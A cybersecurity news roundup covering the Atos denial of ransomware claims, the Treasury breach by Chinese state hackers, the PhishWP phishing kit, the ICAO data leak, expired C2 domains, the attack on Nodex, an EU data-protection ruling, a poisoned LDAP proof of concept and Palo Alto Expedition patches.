French technology firm Atos, which secures communications for France’s military and intelligence services, has denied claims made by the Space Bears ransomware gang that they compromised one of its databases.

Atos describes itself as Europe’s leading cybersecurity, cloud, and high-performance computing company with over 1,200 clients from 70 countries.

On December 28, Space Bears named Atos on its darknet site and threatened to publish data stolen from the company on January 8. On Friday (January 3), Atos dismissed Space Bears’ claims as “unfounded.” It added that “no infrastructure managed by Atos was breached, no source code accessed, and no Atos IP or Atos proprietary data exposed.” However, the company also said that “external third-party infrastructure, unconnected to Atos, has been compromised by the group Space Bears. This infrastructure contained data mentioning the Atos company name, but is not managed nor secured by Atos.”

The incident comes as Atos is in negotiations to sell off its advanced computing division to the French State as the company attempts to restructure amid financial woes.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has said that the Treasury Department is the only federal agency impacted by a recently announced breach by state-backed hackers from China.

The Treasury Department disclosed on December 30 that Chinese government hackers breached its network after compromising a BeyondTrust instance used by the federal agency using a stolen Remote Support SaaS API key. The agency said that BeyondTrust first notified it of the breach on December 8. “Based on available indicators, the incident has been attributed to a China state-sponsored Advanced Persistent Threat (APT) actor. In accordance with Treasury policy, intrusions attributable to an APT are considered a major cybersecurity incident,” the agency said in a letter to Congress.

U.S. officials later revealed that the attackers specifically targeted the Office of Foreign Assets Control (OFAC), which administers and enforces trade and economic sanctions programs. The threat actors also breached the Treasury’s Office of Financial Research. However, officials said there was no evidence that the Chinese state hackers maintained access to the agency’s systems after shutting down the compromised BeyondTrust instance.

CISA said on Monday (January 6) that there is “no indication that any other federal agencies have been impacted” by the campaign aimed at the Treasury. “CISA continues to monitor the situation and coordinate with relevant federal authorities to ensure a comprehensive response,” the agency said. “We are working aggressively to safeguard against any further impacts and will provide updates, as appropriate.”

Researchers have discovered a new WordPress plugin phishing tool kit designed for use on WordPress installations that can be used to create sophisticated and feature-rich phishing sites to steal user information.

Dubbed PhishWP, the kit is designed to steal payment card information and is offered for sale on Russian underground forums. It features a rich set of functionality that ticks many boxes on a cybercriminal’s wish list. The kit’s features include the capability to generate fake checkout pages for many commonly used payment processors, such as Stripe. It can intercept one-time passwords (OTP) used in the 3D secure (3DS) process often used during the payment processing to help secure card transactions. The kit also includes an integration with Telegram so that cybercriminals can be instantly informed when a new transaction is in progress.

When transactions are completed, the kit can even send fake order confirmation emails to victims to make it appear as if their transactions were successful, which can help delay detection of the fraud.

The kit supports multiple languages to enable it to be targeted at victims in different regions and has a range of obfuscation options that can be employed to help maintain stealth.

Typical use of the kit could involve the cybercriminal setting up fake websites and generating traffic to them or hacking into existing websites of legitimate businesses and planting fake checkout pages on the hacked servers to capture traffic to the site.

The United Nations’ International Civil Aviation Organization (ICAO) has confirmed that a hacker accessed thousands of records after compromising its internal recruitment database.

Established in 1944, ICAO works with 193 countries to support the development of mutually recognized technical standards.

On Monday (January 6), ICAO announced it was investigating “reports of a potential information security incident allegedly linked to a threat actor known for targeting international organizations.” The announcement came two days after a threat actor named Natohub leaked 42,000 documents reportedly stolen from ICAO on the BreachForums hacking forum.

On Tuesday (January 7), the agency confirmed the breach, telling reporters that the “incident involves approximately 42,000 recruitment application data records from April 2016 to July 2024 claimed to be released by the threat actor known as Natohub.”

The compromised data includes job applicants’ names, email addresses, dates of birth, and employment history. “The affected data does not include financial information, passwords, passport details, or any documents uploaded by applicants,” according to ICAO. The agency added that the breach is limited to the recruitment database and that it is working to identify and notify affected individuals.

Researchers have discovered that expired domains are another handy way for cybercriminals to profit from the work of others who may have previously compromised computers in an organization.

Command and control servers used in cyberattacks often use domain names that are registered by attackers for a one-off purpose, used for a short time, and then abandoned when they are no longer needed. However, domain name registrations typically expire after a year, and if they are not renewed by the original owner, they become available for another person to register.

This is exactly what the researchers did with 40 expired domains that were known to be used previously by attackers. What they found upon registering the domains and monitoring communications to them was that there were still more than 4,000 machines actively reaching out to them. Many of the machines reaching out were running various backdoors and web shells, which could be used to remotely access and control the infected machines.

Infected machines came from many different countries and organizations, including governments and academic institutions.

Disturbingly, the presence of this traffic indicates that the infected machines have remained infected for a long time and the expired domains meant that any other attacker could have potentially gained control over them and gain access to the infected computers. To prevent this, the researchers have passed the control of the re-registered domains to The Shadowserver Foundation, which subsequently sink-holed them.

Russian internet provider Nodex revealed on Tuesday (January 7) that its network had been crippled in a cyberattack suspected to originate from Ukraine.

Nodex said the “planned” attack “destroyed” its infrastructure overnight. The St. Petersburg-based company added that it was working to restore systems from backups but did not know how long it would be before operations would resume. “Our priority is to restore telephony and the call center first,” the company stated.

According to internet monitoring service NetBlocks, Nodex’s connectivity collapsed at midnight on Tuesday, affecting both fixed-line and mobile services.

A hacker group known as the Ukrainian Cyber Alliance claimed responsibility for the attack, stating that Nodex was “completely looted and wiped, and its data exfiltrated.” The group also shared screenshots of hacked systems and data they allegedly stole.

For the first time, the European General Court on Wednesday (January 8) fined the European Commission for breaching its own data protection laws.

The court ordered the European Union’s top executive authority to pay damages to a German citizen for transferring their personal data to the U.S. without appropriate protections, violating its own data processing rules.

The incident occurred when the German citizen signed up for a conference by the commission via a Facebook sign-in option on the event’s website in 2022. The citizen alleged their digital privacy rights were infringed because data about their device, browser, and IP address were sent to Amazon, the website host and Meta, Facebook’s parent company. The court concluded that the action constituted a “sufficiently serious breach” of the rules.

Threat actors have once again taken to creating and spreading poisoned proof-of-concept (PoC) code to help them compromise targets.

In the latest instance, the threat actors targeted a recent Windows LDAP denial-of-service (DoS) vulnerability (CVE-2024-49113 – CVSS score: 6.5) to use as bait. This vulnerability along with another associated LDAP remote code execution vulnerability (CVE-2024-49112 – CVSS score: 8.5) was patched by Microsoft in December 2024 as part of the Patch Tuesday release.

Following the patch releases by Microsoft, researchers released the PoC for CVE-2024-49113 in early January 2025, and soon after that threat actors got to work and forked the original LDAPNightmore PoC project. But instead of creating a Python-based threat that would look more in line with the original project, they replaced all the original Python files with a UPX-packed “poc.exe” file. The Git project also contains elements of the Korean language, suggesting the origins and potential targets for the fake project.

If the intended target user downloads and runs the poc.exe file, it will result in the dropping and execution of a PowerShell script that sets up persistence for the attacker by creating a scheduled task to run another encoded script. The script then tries to pull down another script from a Pastebin link which contains instructions to collect a range of information from the compromised computer and upload it to another location for the attackers to retrieve.

Palo Alto Networks on Wednesday (January 8) released updates to address multiple vulnerabilities in its Expedition migration tool, including a high-severity flaw that can lead to sensitive information disclosure.

The Expedition tool (previously known as Migration Tool) assists organizations when migrating from other firewall vendors to the Palo Alto Networks NGFW platform. Expedition was retired on December 31, 2024.

A high-severity SQL injection vulnerability (CVE-2025-0103 – CVSS score: 7.8) in Expedition could allow authenticated attackers to read database contents and arbitrary files. The flaw can also be exploited to “create and delete arbitrary files on the Expedition system. These files include information such as usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software,” Palo Alto Networks explained.

CVE-2025-0103 was addressed with the release of Expedition version 1.2.101, which also fixes four medium- and low-severity issues leading to JavaScript code execution, arbitrary file deletion, file enumeration, and information disclosure.

Palo Alto Networks warned Expedition users that the product will receive no additional updates or security fixes and urged customers to find alternative solutions.